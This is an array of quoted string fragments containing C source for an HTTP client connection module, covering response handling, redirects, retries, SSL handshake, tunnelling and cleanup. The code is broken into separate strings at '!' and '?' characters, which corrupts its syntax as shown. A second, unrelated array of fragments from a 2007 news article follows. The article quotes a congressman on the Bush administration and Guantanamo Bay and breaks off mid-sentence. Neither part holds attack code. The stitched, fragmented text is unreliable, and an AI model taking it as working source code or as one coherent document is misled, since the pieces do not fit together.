"\n\t\t\t\thttp_client_connection_close(&conn);\n\t\t\t\treturn;\n\t\t\t}\n\n\t\t\tif (conn->conn.output !", "= NULL)\n\t\t\t\to_stream_set_flush_pending(conn->conn.output, TRUE);\n\t\t\treturn;\n\t\t} else if (response.status / 100 == 1) {\n\t\t\t/* Ignore other 1xx for now */\n\t\t\te_debug(conn->event,\n\t\t\t\t\"Got unexpected %u response; ignoring\",\n\t\t\t\tresponse.status);\n\t\t\tcontinue;\n\t\t} else if (!", "req->payload_sync && !", "req->payload_finished &&\n\t\t\t req->state == HTTP_REQUEST_STATE_PAYLOAD_OUT) {\n\t\t\t/* Got early response from server while we're still\n\t\t\t sending request payload. ", "we cannot recover from this\n\t\t\t reliably, so we stop sending payload and close the\n\t\t\t connection once the response is processed */\n\t\t\te_debug(conn->event,\n\t\t\t\t\"Got early input from server; \"\n\t\t\t\t\"request payload not completely sent \"\n\t\t\t\t\"(will close connection)\");\n\t\t\to_stream_unset_flush_callback(conn->conn.output);\n\t\t\tconn->output_broken = early = TRUE;\n\t\t}\n\n\t\tconst char *suffix =\n\t\t\thttp_client_request_add_event_headers(req, &response);\n\t\te_debug(conn->event,\n\t\t\t\"Got %u response for request %s: %s%s \"\n\t\t\t\"(took %u ms + %u ms in queue)\",\n\t\t\tresponse.status, http_client_request_label(req),\n\t\t\tresponse.reason, suffix,\n\t\t\ttimeval_diff_msecs(&req->response_time, &req->sent_time),\n\t\t\ttimeval_diff_msecs(&req->sent_time, &req->submit_time));\n\n\t\t/* Make sure connection output is unlocked if 100-continue\n\t\t failed */\n\t\tif (req->payload_sync && !", "req->payload_sync_continue) {\n\t\t\te_debug(conn->event, \"Unlocked output\");\n\t\t\tconn->output_locked = FALSE;\n\t\t}\n\n\t\t/* Remove request from queue */\n\t\tarray_pop_front(&conn->request_wait_list);\n\t\taborted = (req->state == HTTP_REQUEST_STATE_ABORTED);\n\t\treq_ref = req;\n\t\tif (!", "http_client_connection_unref_request(conn, &req_ref)) {\n\t\t\ti_assert(aborted);\n\t\t\treq = NULL;\n\t\t}\n\n\t\tconn->close_indicated = response.connection_close;\n\n\t\tif (!", "aborted) {\n\t\t\tbool handled = FALSE;\n\n\t\t\t/* Response cannot be 2xx if request payload was not\n\t\t\t completely sent */\n\t\t\tif (early && response.status / 100 == 2) {\n\t\t\t\thttp_client_request_error(\n\t\t\t\t\t&req, HTTP_CLIENT_REQUEST_ERROR_BAD_RESPONSE,\n\t\t\t\t\t\"Server responded with success response \"\n\t\t\t\t\t\"before all payload was sent\");\n\t\t\t\thttp_client_connection_close(&conn);\n\t\t\t\treturn;\n\t\t\t}\n\n\t\t\t/* Don't redirect/retry if we're sending data in small\n\t\t\t blocks via http_client_request_send_payload()\n\t\t\t and we're not waiting for 100 continue */\n\t\t\tif (!", "req->payload_wait ||\n\t\t\t (req->payload_sync && !", "req->payload_sync_continue)) {\n\t\t\t\t/* Failed Expect: */\n\t\t\t\tif (response.status == 417 && req->payload_sync) {\n\t\t\t\t\t/* Drop Expect: continue */\n\t\t\t\t\treq->payload_sync = FALSE;\n\t\t\t\t\tconn->output_locked = FALSE;\n\t\t\t\t\tpshared->no_payload_sync = TRUE;\n\t\t\t\t\tif (http_client_request_try_retry(req))\n\t\t\t\t\t\thandled = TRUE;\n\t\t\t\t/* Redirection */\n\t\t\t\t} else if (!", "req->client->set.no_auto_redirect &&\n\t\t\t\t\t response.status / 100 == 3 &&\n\t\t\t\t\t response.status !", "= 304 &&\n\t\t\t\t\t response.location !", "= NULL) {\n\t\t\t\t\t/* Redirect (possibly after delay) */\n\t\t\t\t\tif (http_client_request_delay_from_response(\n\t\t\t\t\t\treq, &response) >= 0) {\n\t\t\t\t\t\thttp_client_request_redirect(\n\t\t\t\t\t\t\treq, response.status,\n\t\t\t\t\t\t\tresponse.location);\n\t\t\t\t\t\thandled = TRUE;\n\t\t\t\t\t}\n\t\t\t\t/* Service unavailable */\n\t\t\t\t} else if (response.status == 503) {\n\t\t\t\t\t/* Automatically retry after delay if\n\t\t\t\t\t indicated */\n\t\t\t\t\tif (response.retry_after !", "= (time_t)-1 &&\n\t\t\t\t\t http_client_request_delay_from_response(\n\t\t\t\t\t\treq, &response) > 0 &&\n\t\t\t\t\t http_client_request_try_retry(req))\n\t\t\t\t\t\thandled = TRUE;\n\t\t\t\t/* Request timeout (by server) */\n\t\t\t\t} else if (response.status == 408) {\n\t\t\t\t\t/* Automatically retry */\n\t\t\t\t\tif (http_client_request_try_retry(req))\n\t\t\t\t\t\thandled = TRUE;\n\t\t\t\t\t/* Connection close is implicit,\n\t\t\t\t\t although server should indicate that\n\t\t\t\t\t explicitly */\n\t\t\t\t\tconn->close_indicated = TRUE;\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tif (!", "handled) {\n\t\t\t\t/* Response for application */\n\t\t\t\tif (!", "http_client_connection_return_response(\n\t\t\t\t\tconn, req, &response))\n\t\t\t\t\treturn;\n\t\t\t}\n\t\t}\n\n\t\tfinished++;\n\n\t\t/* Server closing connection? */", "\n\t\tif (conn->close_indicated) {\n\t\t\thttp_client_connection_server_close(&conn);\n\t\t\treturn;\n\t\t}\n\n\t\t/* Get next waiting request */\n\t\treqs = array_get(&conn->request_wait_list, &count);\n\t\tif (count > 0) {\n\t\t\treq = reqs[0];\n\n\t\t\t/* Determine whether to expect a response payload */\n\t\t\tpayload_type = http_client_request_get_payload_type(req);\n\t\t} else {\n\t\t\t/* No more requests waiting for the connection */\n\t\t\treq = NULL;\n\t\t\tpayload_type = HTTP_RESPONSE_PAYLOAD_TYPE_ALLOWED;\n\t\t\thttp_client_connection_stop_request_timeout(conn);\n\t\t}\n\n\t\t/* Drop connection with broken output if last possible input was\n\t\t received */\n\t\tif (conn->output_broken && (count == 0 ||\n\t\t (count == 1 && req->state == HTTP_REQUEST_STATE_ABORTED))) {\n\t\t\thttp_client_connection_server_close(&conn);\n\t\t\treturn;\n\t\t}\n\t}\n\n\tif (ret <= 0 &&\n\t (conn->conn.input->eof || conn->conn.input->stream_errno !", "= 0)) {\n\t\tint stream_errno = conn->conn.input->stream_errno;\n\t\thttp_client_connection_lost(\n\t\t\t&conn,\n\t\t\tt_strdup_printf(\"read(%s) failed: %s\",\n\t\t\t\t\ti_stream_get_name(conn->conn.input),\n\t\t\t\t\t(stream_errno !", "= 0 ?", "\n\t\t\t\t\t i_stream_get_error(conn->conn.input) :\n\t\t\t\t\t \"EOF\")));\n\t\treturn;\n\t}\n\n\tif (ret < 0) {\n\t\thttp_client_connection_abort_error(\n\t\t\t&conn, HTTP_CLIENT_REQUEST_ERROR_BAD_RESPONSE, error);\n\t\treturn;\n\t}\n\n\tif (finished > 0) {\n\t\t/* Connection still alive after (at least one) request;\n\t\t we can pipeline -> mark for subsequent connections */\n\t\tpshared->allows_pipelining = TRUE;\n\n\t\t/* Room for new requests */\n\t\tif (peer !", "= NULL &&\n\t\t http_client_connection_check_ready(conn) > 0)\n\t\t\thttp_client_peer_trigger_request_handler(peer);\n\t}\n}\n\nstatic int\nhttp_client_connection_continue_request(struct http_client_connection *conn)\n{\n\tstruct http_client_connection *tmp_conn;\n\tstruct http_client_request *const *reqs;\n\tunsigned int count;\n\tstruct http_client_request *req;\n\tbool pipelined;\n\tint ret;\n\n\treqs = array_get(&conn->request_wait_list, &count);\n\ti_assert(count > 0 || conn->to_requests == NULL);\n\tif (count == 0 || !", "conn->output_locked)\n\t\treturn 1;\n\n\treq = reqs[count-1];\n\tpipelined = (count > 1 || conn->pending_request !", "= NULL);\n\n\tif (req->state == HTTP_REQUEST_STATE_ABORTED) {\n\t\te_debug(conn->event,\n\t\t\t\"Request aborted before sending payload was complete.\");", "\n\t\tif (count == 1) {\n\t\t\thttp_client_connection_close(&conn);\n\t\t\treturn -1;\n\t\t}\n\t\to_stream_unset_flush_callback(conn->conn.output);\n\t\tconn->output_broken = TRUE;\n\t\treturn -1;\n\t}\n\n\tif (req->payload_sync && !", "req->payload_sync_continue)\n\t\treturn 1;\n\n\ttmp_conn = conn;\n\thttp_client_connection_ref(tmp_conn);\n\tret = http_client_request_send_more(req, pipelined);\n\tif (!", "http_client_connection_unref(&tmp_conn) || ret < 0)\n\t\treturn -1;\n\n\tif (!", "conn->output_locked) {\n\t\t/* Room for new requests */\n\t\tif (http_client_connection_check_ready(conn) > 0)\n\t\t\thttp_client_peer_trigger_request_handler(conn->peer);\n\t}\n\treturn ret;\n}\n\nint http_client_connection_output(struct http_client_connection *conn)\n{\n\tstruct ostream *output = conn->conn.output;\n\tint ret;\n\n\t/* We've seen activity from the server; reset request timeout */\n\thttp_client_connection_reset_request_timeout(conn);\n\n\tif ((ret = o_stream_flush(output)) <= 0) {\n\t\tif (ret < 0)\n\t\t\thttp_client_connection_handle_output_error(conn);\n\t\treturn ret;\n\t}\n\n\ti_assert(!conn->output_broken);\n\n\tif (conn->ssl_iostream !", "= NULL &&\n\t !", "ssl_iostream_is_handshaked(conn->ssl_iostream))\n\t\treturn 1;\n\n\treturn http_client_connection_continue_request(conn);\n}\n\nvoid http_client_connection_start_tunnel(struct http_client_connection **_conn,\n\t\t\t\t\t struct http_client_tunnel *tunnel)\n{\n\tstruct http_client_connection *conn = *_conn;\n\n\ti_assert(conn->tunneling);\n\n\t/* Claim connection streams */\n\ti_zero(tunnel);\n\ttunnel->input = conn->conn.input;\n\ttunnel->output = conn->conn.output;\n\ttunnel->fd_in = conn->conn.fd_in;\n\ttunnel->fd_out = conn->conn.fd_out;\n\n\t/* Detach from connection */\n\tconn->conn.input = NULL;\n\tconn->conn.output = NULL;\n\tconn->conn.fd_in = -1;\n\tconn->conn.fd_out = -1;\n\tconn->closing = TRUE;\n\tconn->connected = FALSE;\n\tconnection_disconnect(&conn->conn);\n\n\thttp_client_connection_unref(_conn);\n}\n\nstatic void http_client_connection_ready(struct http_client_connection *conn)\n{\n\tstruct http_client_peer *peer = conn->peer;\n\tstruct http_client_peer_pool *ppool = conn->ppool;\n\tstruct http_client_peer_shared *pshared = ppool->peer;\n\tconst struct http_client_settings *set =\n\t\thttp_client_connection_get_settings(conn);\n\n\te_debug(conn->event, \"Ready for requests\");\n\ti_assert(!conn->connect_succeeded);\n\n\t/* Connected */\n\tconn->connected = TRUE;\n\tconn->last_ioloop = current_ioloop;\n\ttimeout_remove(&conn->to_connect);\n\n\t/* Indicate connection success */\n\tconn->connect_succeeded = TRUE;\n\thttp_client_connection_unlist_pending(conn);\n\thttp_client_peer_connection_success(peer);\n\n\t/* Start raw log */\n\tif (ppool->rawlog_dir !", "= NULL) {\n\t\tiostream_rawlog_create(ppool->rawlog_dir,\n\t\t\t\t &conn->conn.input, &conn->conn.output);\n\t}\n\n\t/* Direct tunneling connections handle connect requests just by\n\t providing a raw connection */\n\tif (pshared->addr.type == HTTP_CLIENT_PEER_ADDR_RAW) {\n\t\tstruct http_client_request *req;\n\n\t\treq = http_client_peer_claim_request(conn->peer, FALSE);\n\t\tif (req !", "= NULL) {\n\t\t\tstruct http_response response;\n\n\t\t\tconn->tunneling = TRUE;\n\n\t\t\ti_zero(&response);\n\t\t\tresponse.status = 200;\n\t\t\tresponse.reason = \"OK\";\n\n\t\t\t(void)http_client_connection_return_response(conn, req,\n\t\t\t\t\t\t\t\t &response);\n\t\t\treturn;\n\t\t}\n\n\t\te_debug(conn->event,\n\t\t\t\"No raw connect requests pending; \"\n\t\t\t\"closing useless connection\");\n\t\thttp_client_connection_close(&conn);\n\t\treturn;\n\t}\n\n\t/* Start protocol I/O */\n\tconn->http_parser = http_response_parser_init(\n\t\tconn->conn.input, &set->response_hdr_limits, 0);\n\to_stream_set_finish_via_child(conn->conn.output, FALSE);\n\to_stream_set_flush_callback(conn->conn.output,\n\t\t\t\t http_client_connection_output, conn);\n}\n\nstatic int\nhttp_client_connection_ssl_handshaked(const char **error_r, void *context)\n{\n\tstruct http_client_connection *conn = context;\n\tstruct http_client_peer_shared *pshared = conn->ppool->peer;\n\tconst struct http_client_settings *set =\n\t\thttp_client_connection_get_settings(conn);\n\tconst char *error, *host = pshared->addr.a.tcp.https_name;\n\n\tif (ssl_iostream_check_cert_validity(conn->ssl_iostream,\n\t\t\t\t\t host, &error) == 0)\n\t\te_debug(conn->event, \"SSL handshake successful\");\n\telse if (set->ssl->allow_invalid_cert) {\n\t\te_debug(conn->event, \"SSL handshake successful, \"\n\t\t\t\"ignoring invalid certificate: %s\", error);\n\t} else {\n\t\t*error_r = error;\n\t\treturn -1;\n\t}\n\treturn 0;\n}\n\nstatic int \nhttp_client_connection_ssl_init(struct http_client_connection *conn,\n\t\t\t\tconst char **error_r)\n{\n\tstruct http_client_peer_pool *ppool = conn->ppool;\n\tstruct http_client_peer_shared *pshared = ppool->peer;\n\tconst struct http_client_settings *set =\n\t\thttp_client_connection_get_settings(conn);\n\tstruct ssl_iostream_settings ssl_set;\n\tstruct ssl_iostream_context *ssl_ctx = ppool->ssl_ctx;\n\tconst char *error;\n\n\ti_assert(ssl_ctx !", "= NULL);\n\n\tssl_set = *set->ssl;\n\tif (!", "set->ssl->allow_invalid_cert) {\n\t\tssl_set.verbose_invalid_cert = TRUE;\n\t}\n\n\te_debug(conn->event, \"Starting SSL handshake\");\n\n\tconnection_input_halt(&conn->conn);\n\tif (io_stream_create_ssl_client(ssl_ctx, pshared->addr.a.tcp.https_name,\n\t\t\t\t\t&ssl_set,\n\t\t\t\t\t&conn->conn.input, &conn->conn.output,\n\t\t\t\t\t&conn->ssl_iostream, &error) < 0) {\n\t\t*error_r = t_strdup_printf(\n\t\t\t\"Couldn't initialize SSL client for %s: %s\",\n\t\t\tconn->conn.name, error);\n\t\treturn -1;\n\t}\n\tconnection_input_resume(&conn->conn);\n\tssl_iostream_set_handshake_callback(\n\t\tconn->ssl_iostream,\n\t\thttp_client_connection_ssl_handshaked, conn);\n\tif (ssl_iostream_handshake(conn->ssl_iostream) < 0) {\n\t\t*error_r = t_strdup_printf(\n\t\t\t\"SSL handshake to %s failed: %s\", conn->conn.name,\n\t\t\tssl_iostream_get_last_error(conn->ssl_iostream));\n\t\treturn -1;\n\t}\n\n\tif (ssl_iostream_is_handshaked(conn->ssl_iostream)) {\n\t\thttp_client_connection_ready(conn);\n\t} else {\n\t\t/* Wait for handshake to complete; connection input handler does\n\t\t the rest by reading from the input stream */\n\t\to_stream_set_flush_callback(\n\t\t\tconn->conn.output, http_client_connection_output, conn);\n\t}\n\treturn 0;\n}\n\nstatic void \nhttp_client_connection_connected(struct connection *_conn, bool success)\n{\n\tstruct http_client_connection *conn =\n\t\t(struct http_client_connection *)_conn;\n\tstruct http_client_peer_shared *pshared = conn->ppool->peer;\n\tconst struct http_client_settings *set =\n\t\thttp_client_connection_get_settings(conn);\n\tconst char *error;\n\n\tif (!", "success) {\n\t\thttp_client_connection_failure(\n\t\t\tconn, t_strdup_printf(\"connect(%s) failed: %m\",\n\t\t\t\t\t _conn->name));\n\t} else {\n\t\tconn->connected_timestamp = ioloop_timeval;\n\t\te_debug(conn->event, \"Connected\");\n\n\t\t(void)net_set_tcp_nodelay(_conn->fd_out, TRUE);\n\t\tif (set->socket_send_buffer_size > 0 &&\n\t\t net_set_send_buffer_size(\n\t\t\t_conn->fd_out, set->socket_send_buffer_size) < 0) {\n\t\t\ti_error(\"net_set_send_buffer_size(%zu) failed: %m\",\n\t\t\t\tset->socket_send_buffer_size);\n\t\t}\n\t\tif (set->socket_recv_buffer_size > 0 &&\n\t\t net_set_recv_buffer_size(\n\t\t\t_conn->fd_in, set->socket_recv_buffer_size) < 0) {\n\t\t\ti_error(\"net_set_recv_buffer_size(%zu) failed: %m\",\n\t\t\t\tset->socket_recv_buffer_size);\n\t\t}\n\n\t\tif (http_client_peer_addr_is_https(&pshared->addr)) {\n\t\t\tif (http_client_connection_ssl_init(conn, &error) < 0) {\n\t\t\t\te_debug(conn->event, \"%s\", error);\n\t\t\t\thttp_client_connection_failure(conn, error);\n\t\t\t\thttp_client_connection_close(&conn);\n\t\t\t}\n\t\t\treturn;\n\t\t}\n\t\thttp_client_connection_ready(conn);\n\t}\n}\n\nstatic const struct connection_settings http_client_connection_set = {\n\t.input_max_size = (size_t)-1,\n\t.output_max_size = (size_t)-1,\n\t.client = TRUE,\n\t.delayed_unix_client_connected_callback = TRUE,\n\t.log_connection_id = TRUE,\n};\n\nstatic const struct connection_vfuncs http_client_connection_vfuncs = {\n\t.destroy = http_client_connection_destroy,\n\t.input = http_client_connection_input,\n\t.client_connected = http_client_connection_connected,\n};\n\nstruct connection_list *http_client_connection_list_init(void)\n{\n\treturn connection_list_init(&http_client_connection_set,\n\t\t\t\t &http_client_connection_vfuncs);\n}\n\nstatic void\nhttp_client_connection_delayed_connect_error(\n\tstruct http_client_connection *conn)\n{\n\ttimeout_remove(&conn->to_input);\n\terrno = conn->connect_errno;\n\thttp_client_connection_connected(&conn->conn, FALSE);\n\thttp_client_connection_close(&conn);\n}\n\nstatic void http_client_connect_timeout(struct http_client_connection *conn)\n{\n\tconn->conn.disconnect_reason = CONNECTION_DISCONNECT_CONNECT_TIMEOUT;\n\thttp_client_connection_destroy(&conn->conn);\n}\n\nstatic void\nhttp_client_connection_connect(struct http_client_connection *conn,\n\t\t\t unsigned int timeout_msecs)\n{\n\tstruct http_client_context *cctx = conn->ppool->peer->cctx;\n\n\tconn->connect_start_timestamp = ioloop_timeval;\n\tif (connection_client_connect(&conn->conn) < 0) {\n\t\tconn->connect_errno = errno;\n\t\te_debug(conn->event, \"Connect failed: %m\");\n\t\tconn->to_input = timeout_add_short_to(\n\t\t\tconn->conn.ioloop, 0,\n\t\t\thttp_client_connection_delayed_connect_error, conn);\n\t\treturn;\n\t}\n\n\t/* Don't use connection.h timeout because we want this timeout\n\t to include also the SSL handshake */\n\tif (timeout_msecs > 0) {\n\t\tconn->to_connect = timeout_add_to(\n\t\t\tcctx->ioloop, timeout_msecs,\n\t\t\thttp_client_connect_timeout, conn);\n\t}\n}\n\nstatic void\nhttp_client_connect_tunnel_timeout(struct http_client_connection *conn)\n{\n\tstruct http_client_peer_shared *pshared = conn->ppool->peer;\n\tconst char *error, *name = http_client_peer_addr2str(&pshared->addr);\n\tunsigned int msecs;\n\n\tmsecs = timeval_diff_msecs(&ioloop_timeval,\n\t\t\t\t &conn->connect_start_timestamp);\n\terror = t_strdup_printf(\"Tunnel connect(%s) failed: \"\n\t\t\t\t\"Connection timed out in %u.%03u secs\",\n\t\t\t\tname, msecs/1000, msecs%1000);\n\n\te_debug(conn->event, \"%s\", error);\n\thttp_client_connection_failure(conn, error);\n\thttp_client_connection_close(&conn);\n}\n\nstatic void\nhttp_client_connection_tunnel_response(const struct http_response *response,\n\t\t\t\t struct http_client_connection *conn)\n{\n\tstruct http_client_peer_shared *pshared = conn->ppool->peer;\n\tstruct http_client_context *cctx = pshared->cctx;\n\tstruct http_client_tunnel tunnel;\n\tconst char *name = http_client_peer_addr2str(&pshared->addr);\n\tstruct http_client_request *req = conn->connect_request;\n\n\tconn->connect_request = NULL;\n\n\tif (response->status !", "= 200) {\n\t\thttp_client_connection_failure(\n\t\t\tconn,\n\t\t\tt_strdup_printf(\"Tunnel connect(%s) failed: %s\", name,\n\t\t\t\t\thttp_response_get_message(response)));\n\t\treturn;\n\t}\n\n\thttp_client_request_start_tunnel(req, &tunnel);\n\n\tconn->conn.event_parent = conn->event;\n\tconnection_init_from_streams(cctx->conn_list, &conn->conn,\n\t\t\t\t name, tunnel.input, tunnel.output);\n\tconnection_switch_ioloop_to(&conn->conn, cctx->ioloop);\n\ti_stream_unref(&tunnel.input);\n\to_stream_unref(&tunnel.output);\n}\n\nstatic void\nhttp_client_connection_connect_tunnel(struct http_client_connection *conn,\n\t\t\t\t const struct ip_addr *ip, in_port_t port,\n\t\t\t\t unsigned int timeout_msecs)\n{\n\tstruct http_client_context *cctx = conn->ppool->peer->cctx;\n\tstruct http_client *client = conn->peer->client;\n\n\tconn->connect_start_timestamp = ioloop_timeval;\n\n\tconn->connect_request = http_client_request_connect_ip(\n\t\tclient, ip, port, http_client_connection_tunnel_response, conn);\n\thttp_client_request_set_urgent(conn->connect_request);\n\thttp_client_request_submit(conn->connect_request);\n\n\t/* Don't use connection.h timeout because we want this timeout\n\t to include also the SSL handshake */\n\tif (timeout_msecs > 0) {\n\t\tconn->to_connect = timeout_add_to(\n\t\t\tcctx->ioloop, timeout_msecs,\n\t\t\thttp_client_connect_tunnel_timeout, conn);\n\t}\n}\n\nstruct http_client_connection *\nhttp_client_connection_create(struct http_client_peer *peer)\n{\n\tstruct http_client_peer_shared *pshared = peer->shared;\n\tstruct http_client_peer_pool *ppool = peer->ppool;\n\tstruct http_client_context *cctx = pshared->cctx;\n\tstruct http_client *client = peer->client;\n\tconst struct http_client_settings *set = &client->set;\n\tstruct http_client_connection *conn;\n\tconst struct http_client_peer_addr *addr = &pshared->addr;\n\tconst char *conn_type = \"UNKNOWN\";\n\tunsigned int timeout_msecs;\n\n\tswitch (pshared->addr.type) {\n\tcase HTTP_CLIENT_PEER_ADDR_HTTP:\n\t\tconn_type = \"HTTP\";\n\t\tbreak;\n\tcase HTTP_CLIENT_PEER_ADDR_HTTPS:\n\t\tconn_type = \"HTTPS\";\n\t\tbreak;\n\tcase HTTP_CLIENT_PEER_ADDR_HTTPS_TUNNEL:\n\t\tconn_type = \"Tunneled HTTPS\";\n\t\tbreak;\n\tcase HTTP_CLIENT_PEER_ADDR_RAW:\n\t\tconn_type = \"Raw\";\n\t\tbreak;\n\tcase HTTP_CLIENT_PEER_ADDR_UNIX:\n\t\tconn_type = \"Unix\";\n\t\tbreak;\n\t}\n\n\ttimeout_msecs = set->connect_timeout_msecs;\n\tif (timeout_msecs == 0)\n\t\ttimeout_msecs = set->request_timeout_msecs;\n\n\tconn = i_new(struct http_client_connection, 1);\n\tconn->refcount = 1;\n\tconn->ppool = ppool;\n\tconn->peer = peer;\n\tconn->debug = client->set.debug;\n\tif (pshared->addr.type !", "= HTTP_CLIENT_PEER_ADDR_RAW)\n\t\ti_array_init(&conn->request_wait_list, 16);\n\tconn->io_wait_timer = io_wait_timer_add_to(cctx->ioloop);\n\n\tconn->conn.event_parent = ppool->peer->cctx->event;\n\tconnection_init(cctx->conn_list, &conn->conn,\n\t\t\thttp_client_peer_shared_label(pshared));\n\tconn->event = conn->conn.event;\n\n\tswitch (pshared->addr.type) {\n\tcase HTTP_CLIENT_PEER_ADDR_HTTPS_TUNNEL:\n\t\thttp_client_connection_connect_tunnel(\n\t\t\tconn, &addr->a.tcp.ip, addr->a.tcp.port, timeout_msecs);\n\t\tbreak;\n\tcase HTTP_CLIENT_PEER_ADDR_UNIX:\n\t\tconnection_init_client_unix(cctx->conn_list, &conn->conn,\n\t\t\t\t\t addr->a.un.path);\n\t\tconnection_switch_ioloop_to(&conn->conn, cctx->ioloop);\n\t\thttp_client_connection_connect(conn, timeout_msecs);\n\t\tbreak;\n\tdefault:\n\t\tconnection_init_client_ip(cctx->conn_list, &conn->conn, NULL,\n\t\t\t\t\t &addr->a.tcp.ip, addr->a.tcp.port);\n\t\tconnection_switch_ioloop_to(&conn->conn, cctx->ioloop);\n\t\thttp_client_connection_connect(conn, timeout_msecs);\n\t}\n\n\tarray_push_back(&ppool->pending_conns, &conn);\n\tarray_push_back(&ppool->conns, &conn);\n\tarray_push_back(&peer->pending_conns, &conn);\n\tarray_push_back(&peer->conns, &conn);\n\n\thttp_client_peer_pool_ref(ppool);\n\n\te_debug(conn->event,\n\t\t\"%s connection created (%d parallel connections exist)%s\",\n\t\tconn_type, array_count(&ppool->conns),\n\t\t(conn->to_input == NULL ? \"\" : \" [", "broken]\"));\n\treturn conn;\n}\n\nvoid http_client_connection_ref(struct http_client_connection *conn)\n{\n\ti_assert(conn->refcount > 0);\n\tconn->refcount++;\n}\n\nstatic void\nhttp_client_connection_disconnect(struct http_client_connection *conn)\n{\n\tstruct http_client_peer_pool *ppool = conn->ppool;\n\tARRAY_TYPE(http_client_connection) *conn_arr;\n\tstruct http_client_connection *const *conn_idx;\n\n\tif (conn->disconnected)\n\t\treturn;\n\tconn->disconnected = TRUE;\n\n\te_debug(conn->event, \"Connection disconnect\");\n\n\tconn->closing = TRUE;\n\tconn->connected = FALSE;\n\n\thttp_client_request_abort(&conn->connect_request);\n\n\tif (conn->incoming_payload !", "= NULL) {\n\t\t/* The stream is still accessed by lib-http caller. */", "\n\t\ti_stream_remove_destroy_callback(conn->incoming_payload,\n\t\t\t\t\t\t http_client_payload_destroyed);\n\t\tconn->incoming_payload = NULL;\n\t}\n\n\tif (conn->http_parser !", "= NULL)\n\t\thttp_response_parser_deinit(&conn->http_parser);\n\n\tconnection_disconnect(&conn->conn);\n\n\tio_remove(&conn->io_req_payload);\n\ttimeout_remove(&conn->to_requests);\n\ttimeout_remove(&conn->to_connect);\n\ttimeout_remove(&conn->to_input);\n\ttimeout_remove(&conn->to_response);\n\n\t/* Remove this connection from the lists */\n\tconn_arr = &ppool->conns;\n\tarray_foreach(conn_arr, conn_idx) {\n\t\tif (*conn_idx == conn) {\n\t\t\tarray_delete(conn_arr,\n\t\t\t\t array_foreach_idx(conn_arr, conn_idx), 1);\n\t\t\tbreak;\n\t\t}\n\t}\n\tconn_arr = &ppool->pending_conns;\n\tarray_foreach(conn_arr, conn_idx) {\n\t\tif (*conn_idx == conn) {\n\t\t\tarray_delete(conn_arr,\n\t\t\t\t array_foreach_idx(conn_arr, conn_idx), 1);\n\t\t\tbreak;\n\t\t}\n\t}\n\n\thttp_client_connection_detach_peer(conn);\n\n\thttp_client_connection_stop_idle(conn); // FIXME: needed?", "\n}\n\nbool http_client_connection_unref(struct http_client_connection **_conn)\n{\n\tstruct http_client_connection *conn = *_conn;\n\tstruct http_client_peer_pool *ppool = conn->ppool;\n\n\ti_assert(conn->refcount > 0);\n\n\t*_conn = NULL;\n\n\tif (--conn->refcount > 0)\n\t\treturn TRUE;\n\n\te_debug(conn->event, \"Connection destroy\");\n\n\thttp_client_connection_disconnect(conn);\n\thttp_client_connection_abort_any_requests(conn);\n\n\ti_assert(conn->io_req_payload == NULL);\n\ti_assert(conn->to_requests == NULL);\n\ti_assert(conn->to_connect == NULL);\n\ti_assert(conn->to_input == NULL);\n\ti_assert(conn->to_idle == NULL);\n\ti_assert(conn->to_response == NULL);\n\n\tif (array_is_created(&conn->request_wait_list))\n\t\tarray_free(&conn->request_wait_list);\n\n\tssl_iostream_destroy(&conn->ssl_iostream);\n\tconnection_deinit(&conn->conn);\n\tio_wait_timer_remove(&conn->io_wait_timer);\n\t\n\ti_free(conn);\n\n\thttp_client_peer_pool_unref(&ppool);\n\treturn FALSE;\n}\n\nvoid http_client_connection_close(struct http_client_connection **_conn)\n{\n\tstruct http_client_connection *conn = *_conn;\n\n\te_debug(conn->event, \"Connection close\");\n\n\thttp_client_connection_disconnect(conn);\n\thttp_client_connection_abort_any_requests(conn);\n\thttp_client_connection_unref(_conn);\n}\n\nvoid http_client_connection_switch_ioloop(struct http_client_connection *conn)\n{\n\tstruct http_client_peer_shared *pshared = conn->ppool->peer;\n\tstruct http_client_context *cctx = pshared->cctx;\n\tstruct ioloop *ioloop = cctx->ioloop;\n\n\tconnection_switch_ioloop_to(&conn->conn, ioloop);\n\tif (conn->io_req_payload !", "= NULL) {\n\t\tconn->io_req_payload =\n\t\t\tio_loop_move_io_to(ioloop, &conn->io_req_payload);\n\t}\n\tif (conn->to_requests !", "= NULL) {\n\t\tconn->to_requests =\n\t\t\tio_loop_move_timeout_to(ioloop, &conn->to_requests);\n\t}\n\tif (conn->to_connect !", "= NULL) {\n\t\tconn->to_connect =\n\t\t\tio_loop_move_timeout_to(ioloop, &conn->to_connect);\n\t}\n\tif (conn->to_input !", "= NULL) {\n\t\tconn->to_input =\n\t\t\tio_loop_move_timeout_to(ioloop, &conn->to_input);\n\t}\n\tif (conn->to_idle !", "= NULL) {\n\t\tconn->to_idle =\n\t\t\tio_loop_move_timeout_to(ioloop, &conn->to_idle);\n\t}\n\tif (conn->to_response !", "= NULL) {\n\t\tconn->to_response =\n\t\t\tio_loop_move_timeout_to(ioloop, &conn->to_response);\n\t}\n\tif (conn->incoming_payload !", "= NULL)\n\t\ti_stream_switch_ioloop_to(conn->incoming_payload, ioloop);\n\tconn->io_wait_timer =\n\t\tio_wait_timer_move_to(&conn->io_wait_timer, ioloop);\n}\n" ]
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[ "Congressman: Bush administration takes its cues from Lenin Michael Roston\n\nPublished: Monday May 21, 2007 Print This Email This A top Congressional Democrat who is working to close the detention facility set up for suspected terrorists at Guantanamo Bay told RAW STORY that he feels like he is fighting against 'Leninist' propaganda from the White House. \"", "This administration, I've never seen an organization that learned the lessons of Lenin as clearly as these guys,\" said Rep. Jim Moran (D-VA) in a Thursday interview. \"", "These guys must tack up Lenin's philosophy on their bedstand every night. ", "Particularly when Lenin suggested if you say something often enough, with enough conviction, everybody will believe it.\" ", "Moran was referring to the tactics being used by the Bush administration to fight moves in Congress to close Guantanamo Bay. ", "The Congressman, who has served his Virginia district since 1991, sits on the Defense Appropriations subcommittee, which decides the Pentagon's annual budgets. ", "Moran has been tasked by the subcommittee's chairman, Rep. John Murtha (D-PA), with devising a plan to shutter Guantanamo Bay. ", "The congressman spoke to RAW STORY in the Rayburn Room off the floor of the House of Representatives. ", "He had just successfully advanced an amendment to the Fiscal Year 2008 Defense Authorization bill that would require Secretary of Defense Robert Gates to report on how every detainee at Guantanamo Bay could be transferred away from the controversial base. ", "Passing on a close 220-208 vote, the amendment could be an early indicator of the difficulties that may be faced in the broader effort to close the base for good. \"", "I think it's going to be difficult,\" Moran acknowledged of his efforts. \"", "What the Republicans' tack is going to be is that these are all terrorists, and do you want them all to be released to your backyard?\" ", "Still, Moran belittled politicians who are trying to use 